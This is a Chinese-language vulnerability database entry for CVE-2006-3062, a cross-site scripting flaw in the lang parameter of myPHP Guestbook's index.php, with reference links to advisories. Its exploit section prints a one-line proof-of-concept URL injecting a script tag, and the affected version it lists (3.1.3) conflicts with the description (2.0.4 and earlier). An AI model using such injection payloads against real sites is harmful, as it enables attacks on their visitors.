myPHP Guestbook index.php 跨站脚本攻击(XSS)漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194494 漏洞类型 跨站脚本
发布时间 2006-06-19 更新时间 2006-06-19
CVE编号 CVE-2006-3062 CNNVD-ID CNNVD-200606-371
漏洞平台 N/A CVSS评分 2.6
|漏洞来源
https://www.securityfocus.com/bid/83818
https://cxsecurity.com/issue/WLB-2006060115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-371
|漏洞详情
myPHPGuestbook2.0.4及更早版本中的index.php存在跨站脚本攻击(XSS)漏洞,远程攻击者可以通过lang参数注入任意Web脚本或HTML。
|漏洞EXP
a xss attack is possible in index.php

http://127.0.01/myphp/index.php?lang="<script>alert(1337)</script>
|受影响的产品
myPHP Guestbook myPHP Guestbook 3.1.3
|参考资料

来源:BUGTRAQ
名称:20060609myPHPGuestbook2.0.2XSSVulnerabilitie
链接:http://www.securityfocus.com/archive/1/archive/1/436842/100/0/threaded
来源:VUPEN
名称:ADV-2006-2308
链接:http://www.frsirt.com/english/advisories/2006/2308
来源:SECUNIA
名称:20572
链接:http://secunia.com/advisories/20572
来源:XF
名称:myphpguestbook-index-xss(27074)
链接:http://xforce.iss.net/xforce/xfdb/27074
来源:SREASON
名称:1110
链接:http://securityreason.com/securityalert/1110